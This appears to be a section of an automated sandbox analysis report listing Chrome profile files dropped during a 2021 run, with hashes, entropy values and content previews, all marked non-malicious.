                                                                                                                                                                Preview: {"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13273639830106535","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\d674daca-5fce-49f8-9af4-0086ecb4b5e5.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1692
                                                                                                                                                                Entropy (8bit):4.946447236044282
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:Y2TtwDHXPqn3zsOUZADs3LRLshVyvTYhbD:JTODHXin1qAQy+0hH
                                                                                                                                                                MD5:B3BCC192F8F6CA097CF62E784CE4C9E9
                                                                                                                                                                SHA1:D6961E9301B6CDF23543DF70E4841CF971504E09
                                                                                                                                                                SHA-256:2F5F9570050AB1BFE1CF856270FFCDD24B233BA1905A0BFCB7D9860388917C78
                                                                                                                                                                SHA-512:999C125EC277BD8B8DB25FDCCACDD4D7C7E6B562AE5C6600EA837D2E4B5D8FB7BF99D7CFA1E70C87663DA126B6C714F98A8E7990AA54E0580AE152ED5DC3846D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://www.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://ssl.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://ogs.google.com","supports_spdy":true},{"isolation":[],"server":"https://apis.google.com","supports_spdy":true},{"isolation":[],"server":"https://update.googleapis.com","supports_spdy":true},{"isolation":[],"server":"https://www.google.com","supports_spdy":true},{"isolation":[],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3-29"],"expiration":"13276231834467595","port":443,"protocol_str":"quic"},{"advertised_alpns":["h3-Q050"],"expiration":"13276231834467598","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3-29"],"expiration":"13276231834469104","port":443,"protocol_str":"quic"},{"advertised_alpns"
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000006.dbtmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):16
                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:1sjgWIV//Tv:1qIFj
                                                                                                                                                                MD5:AEFD77F47FB84FAE5EA194496B44C67A
                                                                                                                                                                SHA1:DCFBB6A5B8D05662C4858664F81693BB7F803B82
                                                                                                                                                                SHA-256:4166BF17B2DA789B0D0CC5C74203041D98005F5D4EF88C27E8281E00148CD611
                                                                                                                                                                SHA-512:B733D502138821948267A8B27401D7C0751E590E1298FDA1428E663CCD02F55D0D2446FF4BC265BDCDC61F952D13C01524A5341BC86AFC3C2CDE1D8589B2E1C3
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: MANIFEST-000006.
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT\ (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):16
                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:1sjgWIV//Tv:1qIFj
                                                                                                                                                                MD5:AEFD77F47FB84FAE5EA194496B44C67A
                                                                                                                                                                SHA1:DCFBB6A5B8D05662C4858664F81693BB7F803B82
                                                                                                                                                                SHA-256:4166BF17B2DA789B0D0CC5C74203041D98005F5D4EF88C27E8281E00148CD611
                                                                                                                                                                SHA-512:B733D502138821948267A8B27401D7C0751E590E1298FDA1428E663CCD02F55D0D2446FF4BC265BDCDC61F952D13C01524A5341BC86AFC3C2CDE1D8589B2E1C3
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: MANIFEST-000006.
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):139
                                                                                                                                                                Entropy (8bit):4.615108480998806
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:tUK6KpoeSuG1Nj1Zm2vX9ZIKpoMwZVV889ZIKpoMJ6ShVWAv:m+oeSl1Zm2lZvoMw7Vp9ZvoMAmrv
                                                                                                                                                                MD5:63B01C2BF518EEC28D991FC1210DCC3A
                                                                                                                                                                SHA1:59BBCD2F87B22B36CCF5877718AE1FD00AB09FA1
                                                                                                                                                                SHA-256:24C99CBF78148D59124FC8B1CE58320E48170BF8C50E030A1B583E1102B3113B
                                                                                                                                                                SHA-512:D156D3FE89792413F2C21BAB08A12EC017752B68CC141DEC3B7DECC403916033D708AE160659922A1C13025A4822846369ADB128FD92634AAA5C7137360CE355
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:33.997 1c7c Recovering log #5.2021/08/16-19:10:34.235 1c7c Delete type=0 #5.2021/08/16-19:10:34.236 1c7c Delete type=3 #4.
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.oldU (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):139
                                                                                                                                                                Entropy (8bit):4.615108480998806
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:tUK6KpoeSuG1Nj1Zm2vX9ZIKpoMwZVV889ZIKpoMJ6ShVWAv:m+oeSl1Zm2lZvoMw7Vp9ZvoMAmrv
                                                                                                                                                                MD5:63B01C2BF518EEC28D991FC1210DCC3A
                                                                                                                                                                SHA1:59BBCD2F87B22B36CCF5877718AE1FD00AB09FA1
                                                                                                                                                                SHA-256:24C99CBF78148D59124FC8B1CE58320E48170BF8C50E030A1B583E1102B3113B
                                                                                                                                                                SHA-512:D156D3FE89792413F2C21BAB08A12EC017752B68CC141DEC3B7DECC403916033D708AE160659922A1C13025A4822846369ADB128FD92634AAA5C7137360CE355
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:33.997 1c7c Recovering log #5.2021/08/16-19:10:34.235 1c7c Delete type=0 #5.2021/08/16-19:10:34.236 1c7c Delete type=3 #4.
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000006
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:MPEG-4 LOAS
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):50
                                                                                                                                                                Entropy (8bit):4.988758439731456
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Ukk/vxQRDKIV8Eaewl:oO7Vaewl
                                                                                                                                                                MD5:78C55E45E9D1DC2E44283CF45C66728A
                                                                                                                                                                SHA1:88E234D9F7A513C4806845CE5C07E0016CF13352
                                                                                                                                                                SHA-256:7B69A2BEE12703825DC20E7D07292125180B86685D2D1B9FD097DF76FC6791EC
                                                                                                                                                                SHA-512:F2AD4594024871286B98A94223B8E7155C7934EF4EBB55F25A4A485A059F75B572D21BC96E9B48ED394BE8A41FE0208F7BFB6E28A79D75640C5B684F0C848FE3
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: V........leveldb.BytewiseComparator.D...........
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\de085969-ac31-4115-8b2b-d90c7c7bf264.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4108
                                                                                                                                                                Entropy (8bit):5.00328268195565
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:YcBcvlprAGqKlQKHoTw0pB/Pw8cO1TSUQ/9BhUIEyMoI3HmeSye7peVGLrVrqooH:n8AdKINuaRWMoiVmde+VrMVXAiZw4
                                                                                                                                                                MD5:49339D264E2E6524CFC8EAE54EDB1EA8
                                                                                                                                                                SHA1:E7E959B1BB7CEF10FB229BA0F05560717CA4D320
                                                                                                                                                                SHA-256:AF4975729DF354F89A9CDA8AA980C2CE90932A6779DC14E089A820302F35701B
                                                                                                                                                                SHA-512:DCA04B386076322564034343E94B5C09BEA636DEBE72392654EE5ABF214EB51BA5693F3AC15EB682602B04A03C312A72B319CD24E988EAB96D03F3819D19F2B1
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13273639830735874","alternate_error_pages":{"backup":true},"autocomplete":{"retention_policy_last_version":92},"autofill":{"orphan_rows_removed":true},"browser":{"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"this_week_number":2693,"this_week_services_downstream_foreground_kb":{"115188287":27,"125522256":1,"21145003":1051,"35565745":1,"5151071":1}},"default_apps_install_state":2,"domain_diversity":{"last_reporting_timestamp":"13273639830733889"},"download":{"directory_upgrade":true},"extensions":{"alerts":{"initialized":true},"chrome_url_overrides":{},"last_chrome_version":"92.0.4515.107"},"gaia_cookie":{"changed_time":1629166234.486642,"hash":"2jmj7l5rSw0yVb/vlWAYkK/YBwk=","last_list_accounts_data":"[\"gaia.l.a.r\",[]]"},"gcm":{"product_category_for_
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\ef9b2414-78c4-44fb-be94-f36ebf6ad138.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:MS Windows icon resource - 13 icons, 8x8, 32 bits/pixel, 10x10, 32 bits/pixel
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):181072
                                                                                                                                                                Entropy (8bit):5.774426487043815
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:avbYFOZyYb37psk2SVlfN/qskVMxoZ51+XBY95/E5cCDd4QAOXxfzUBn2Y2l3P:a8Y7wqFTkVMO51+XBY96Nd4ByVuV2l3P
                                                                                                                                                                MD5:1B40AC9ABB964672109D49ABFCFE2717
                                                                                                                                                                SHA1:966E224F2887075825D42D2E7E0063BFAA81A99C
                                                                                                                                                                SHA-256:503149B1B47F8296DEDB800251DBD9AF614856F0D7E6AB1C03DBC90EBCE53674
                                                                                                                                                                SHA-512:00B50E49CAFD8246102BB460C7B96C20B50A2DDCB48A64C40D65901B517A2698DB9C5AA5EC7F143314DDB8D74624377F12A95C7F4D9FCE206473E8BBF126388B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ............ .H............. ............... .p............. .h...n......... ............... ......... .... .....n...((.... .h.......00.... ..%..~H..@@.... .(B..&n..``.... .....N......... .(....D........ .2v...M..(............. .................................]..X\.).H...>..Z............\..._...V...F...A...A.......^..Wb...f.)...l...v.M...B...@..Wc...[.....z...`...J.....9...E...k...R.D.......G...A.....;...E...h..XKd..KW..........D...>...=..X....GQ.JW..;M..8K..@H..=;.............JV.YKV.IT.BS.Y........................................(............. .....................................[..TZ.5.B...@..T................X...]...`...\...K...D...A...;.......3...\...e...V...h.).d.G.<...F...@...3...^..Td...X.....e....v.....:...E...=..T`...d...h.B.....?...;...O...B...A...b.!.g...Ru......9...8...P...C...C...l..U].M.5@..............6...C...@..T....EW..LX..=K..Ob..Me..5R..AX..;V..++......BL..KW..KW..DO..BL..EN..AJ..;1..................HT.UIV.FT.BQ.U..............................
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):3353
                                                                                                                                                                Entropy (8bit):5.696135579258566
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:TxLV69gEUCHRHd3GUexxiBSRUotaPtfWU8N8WUeGfJSt1/LWUmbfZfp:qSzKexCSmZDpe8JSlm7Bp
                                                                                                                                                                MD5:58F8F2182EDEE4D3AE63E6E096DB3B4A
                                                                                                                                                                SHA1:C0191223E7ABB795BEF9F6E5249C7EE0107FF2F1
                                                                                                                                                                SHA-256:7FE1B9FDF3434B48AD77CB686F7AE77EB6FF7A14942958F119BED024618FD7C2
                                                                                                                                                                SHA-512:217716FDDFDE0494A7DB19D8B131218F28E7CCA1E4A0677E0EA61C9B5FA9C55F315E3D7DAABD58297CEBFF5D0945D425ADBDA4F099B9ED460A239A9668EBF4E4
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: .v}.x................4_IPH_DesktopTabGroupsNewGroup"..IPH_DesktopTabGroupsNewGroup.....4_IPH_LiveCaption...IPH_LiveCaption...f.7..................20_1_1...1..I=.................20_1_1...1V.e.................._.R...............021_download,3726782d-ba31-439b-8a16-6dc2b219aa18......$3726782d-ba31-439b-8a16-6dc2b219aa18............."....blob:null/a97e8999-2326-461e-9e14-63430d44f79c....file:///"*file:///C:/Users/user/Desktop/file.html*.0.B.J.P..Z.octet/streamb.octet/streamj.........r.........x...............................................J_.Am................4_IPH_PasswordsAccountStorage!..IPH_PasswordsAccountStorage......4_IPH_DesktopTabGroupsNewGroup9u..;...............021_download,3726782d-ba31-439b-8a16-6dc2b219aa18......$3726782d-ba31-439b-8a16-6dc2b219aa18............."....blob:null/a97e8999-2326-461e-9e14-63430d44f79c....file:///"*file:///C:/Users/user/Desktop/file.html*.0.B.J.P..Z.octet/streamb.octet/streamjxt...8...C.:.\.U.s.e.r.s.\.a.l.f.r.e.d.o.\.D.o.w.n.l.o.
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):324
                                                                                                                                                                Entropy (8bit):5.1892796085193345
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+o03Oq2PlLN23iKKdKfrK+IFUtpvo15ZmwPvo2VkwOlLN23iKKdKfrUeLJ:w03Ovy5Kk23FUtpg3/PgA5L5Kk3J
                                                                                                                                                                MD5:470D395326BE25EA73C0D45E30585246
                                                                                                                                                                SHA1:64329E12B0AD1D098EFE2481904567F66F1D4A4A
                                                                                                                                                                SHA-256:610F61FC480617E1D659EC89909525FAD6581845F51F6354B7A8CAA6F823658D
                                                                                                                                                                SHA-512:FACDDE3FBFABDBA9A76D4E1DDDAD2117B5F68F9B5FFD946CDFCD97057D45802FFCC51728FB9A1A2286D58948AC5D70DAC17F61741B33FABFED7847FE0A5E965A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:31.815 1d70 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db/MANIFEST-000001.2021/08/16-19:10:31.816 1d70 Recovering log #3.2021/08/16-19:10:31.817 1d70 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG.oldld (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):324
                                                                                                                                                                Entropy (8bit):5.1892796085193345
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+o03Oq2PlLN23iKKdKfrK+IFUtpvo15ZmwPvo2VkwOlLN23iKKdKfrUeLJ:w03Ovy5Kk23FUtpg3/PgA5L5Kk3J
                                                                                                                                                                MD5:470D395326BE25EA73C0D45E30585246
                                                                                                                                                                SHA1:64329E12B0AD1D098EFE2481904567F66F1D4A4A
                                                                                                                                                                SHA-256:610F61FC480617E1D659EC89909525FAD6581845F51F6354B7A8CAA6F823658D
                                                                                                                                                                SHA-512:FACDDE3FBFABDBA9A76D4E1DDDAD2117B5F68F9B5FFD946CDFCD97057D45802FFCC51728FB9A1A2286D58948AC5D70DAC17F61741B33FABFED7847FE0A5E965A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:31.815 1d70 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db/MANIFEST-000001.2021/08/16-19:10:31.816 1d70 Recovering log #3.2021/08/16-19:10:31.817 1d70 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000003.log
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):524
                                                                                                                                                                Entropy (8bit):3.8962231045990805
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:TRtqcJ8woBn3QfJPmtOl1m8Oc3mF2lHq2tmF2lHuBLD3QkPmto61m88BWX3mF2l6:ZJ8rg/Zp3iDgjoWXZmhrebtGj8D5xs
                                                                                                                                                                MD5:024BE5365AD718F1DC3D5B4248690712
                                                                                                                                                                SHA1:364C638D39A40812FB440F11A2D97AF653A3FCFD
                                                                                                                                                                SHA-256:4804EF1CC9CA7D3E62B3331A3CC4574009A2A650AC5B23AFCF26B4B0D97E97E1
                                                                                                                                                                SHA-512:9EE3E4E162AF7F7894A58615081C1BEFDA4C799AB28F2AE7D967EAE941DE79DDCE3446491735698D77924845E5BBDE7BADC7A71166D70BBE72785AA5695B4ABE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: .DO&.................__global....9J..................3_......Z.N.................4_.......{G.................18_......w...................19_.....'...................20_.....<...................20_......9'..................3_.....@Z.%.................4_......8lS.................18_..........................19_.........................20_........].................20_.....~..%.................21_.....2...................21_..........................9_........k.................9_......D...................__global... .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):342
                                                                                                                                                                Entropy (8bit):5.15116920516014
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+oqAq2PlLN23iKKdKfrzAdIFUtpvoLVXZmwPvoR6kwOlLN23iKKdKfrzILJ:wbvy5Kk9FUtpghX/PgR65L5Kk2J
                                                                                                                                                                MD5:0F5F2631F4F79BDBF3127288748E1702
                                                                                                                                                                SHA1:4B08FA92FE2D8CE6B829895C4ED2E1D6C18A80B7
                                                                                                                                                                SHA-256:FF1B5055E472545D7BF712A198D5C2C3F6E4E0EBFE03E7A06DD58B0455E97B9A
                                                                                                                                                                SHA-512:AE99C44D652632D32623F1CD52D901523EE7204E23680530B30D0126F8F942124A2B769A7A6C6FE42B0D6562226D69523C49537A2C73E6FDD8EEC9BDC4EAB8FF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:31.806 1d70 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2021/08/16-19:10:31.807 1d70 Recovering log #3.2021/08/16-19:10:31.808 1d70 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG.old44 (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):342
                                                                                                                                                                Entropy (8bit):5.15116920516014
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+oqAq2PlLN23iKKdKfrzAdIFUtpvoLVXZmwPvoR6kwOlLN23iKKdKfrzILJ:wbvy5Kk9FUtpghX/PgR65L5Kk2J
                                                                                                                                                                MD5:0F5F2631F4F79BDBF3127288748E1702
                                                                                                                                                                SHA1:4B08FA92FE2D8CE6B829895C4ED2E1D6C18A80B7
                                                                                                                                                                SHA-256:FF1B5055E472545D7BF712A198D5C2C3F6E4E0EBFE03E7A06DD58B0455E97B9A
                                                                                                                                                                SHA-512:AE99C44D652632D32623F1CD52D901523EE7204E23680530B30D0126F8F942124A2B769A7A6C6FE42B0D6562226D69523C49537A2C73E6FDD8EEC9BDC4EAB8FF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:31.806 1d70 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2021/08/16-19:10:31.807 1d70 Recovering log #3.2021/08/16-19:10:31.808 1d70 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Browser
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):106
                                                                                                                                                                Entropy (8bit):3.138546519832722
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:tbloIlrJ5ldQxl7aXVdJiG6R0RlAl:tbdlrnQxZaHIGi0R6l
                                                                                                                                                                MD5:DE9EF0C5BCC012A3A1131988DEE272D8
                                                                                                                                                                SHA1:FA9CCBDC969AC9E1474FCE773234B28D50951CD8
                                                                                                                                                                SHA-256:3615498FBEF408A96BF30E01C318DAC2D5451B054998119080E7FAAC5995F590
                                                                                                                                                                SHA-512:CEA946EBEADFE6BE65E33EDFF6C68953A84EC2E2410884E12F406CAC1E6C8A0793180433A7EF7CE097B24EA78A1FDBB4E3B3D9CDF1A827AB6FF5605DA3691724
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Version
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):13
                                                                                                                                                                Entropy (8bit):2.873140679513133
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:mB4:mu
                                                                                                                                                                MD5:3A0E5D4F452CF99191634D0FFAB744A0
                                                                                                                                                                SHA1:F115BBB898EEFF640D8D19AD44A86C3FCDFFC0AD
                                                                                                                                                                SHA-256:B9D528D3AE283039F4700C7E4E790744C58A26353A91B536DD91CBA4F648A35F
                                                                                                                                                                SHA-512:87BF9DB30598EC454A02A4A32E5458E83870524D4AA497CB167C8A92B7521204B7B75E2BE18D61F9FBE51CA7DE8E35782AA65E6F6F11E4A4926A9B6C85D6528A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 92.0.4515.107
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):77887
                                                                                                                                                                Entropy (8bit):6.0770047727207945
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:RFpu/IsNFIx1ZILCW93va9hCsjUtjOjXMWQ:nQIsXIx1ZIz9S/RgyjXE
                                                                                                                                                                MD5:6CA853231667126C20A0DE78DBC4C67F
                                                                                                                                                                SHA1:CF571115A71A80F94BDA7775C2ABD11D3E1A515D
                                                                                                                                                                SHA-256:9901AB8F03221164C3DECFFF8CEDFBD56F4CF340F089A41DDD5E648630920407
                                                                                                                                                                SHA-512:3DA37F30598C8FC99D6047955BC926F0BE32E64A4B49B8A0797260617E338D9623BE622CCCA1DD62215750A04A4FC074A26984849D8FBAA1274B85C684E3A593
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"91.0.4472.77"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.629166233160556e+12,"network":1.629133834e+12,"ticks":7317648369.0,"uncertainty":3792367.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABBQ7WxpM2gT7fMNkY5iRxkAAAAAAIAAAAAABBmAAAAAQAAIAAAALDWDwoLRYqp0NkiPsTxUN2QcOPsitaJrdacpo+ULE2PAAAAAA6AAAAAAgAAIAAAAOIeKQBWbQSCqXv1OSNS2lIZGHfAdJRwvbkapN4/FWvwMAAAAPz8I/w07KQb4Ut8ObsBGVgFwbuU88R362cCGZpNEtOEILJDMaKWOA4Y9ejBRTt5kEAAAADq8RkIezfgqGPgEaEMkhoGd9qhyBeyucXcRUPEI7mgYIxaDt8C5FJrjkEhV5EOUcUmR2SCzqYelImLnfOlbhRQ"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13267638417137193"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Local Statecr (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):77886
                                                                                                                                                                Entropy (8bit):6.077006982775623
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:sFpu/IsNFIx1ZILCW93va9hCsjUtjOjXMWQ:wQIsXIx1ZIz9S/RgyjXE
                                                                                                                                                                MD5:522D65461F6FB16D8FEE67BCAC8FB033
                                                                                                                                                                SHA1:0CEF645870F4BB6490A331EF3EBFF554373EB62E
                                                                                                                                                                SHA-256:5094EAC1E65BD4D9770B6C06FCC64952C9DDA210AE515D7603707029774E29CB
                                                                                                                                                                SHA-512:8963E3BFC14F0F020F877C4A3C9726D5B0E9DF0F794C1B20FE56BF4009E2F3DFE732ADCBC5B749524123D45A1BDF42E5CA60C52F5CBAA70D31373AB9E8E88022
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
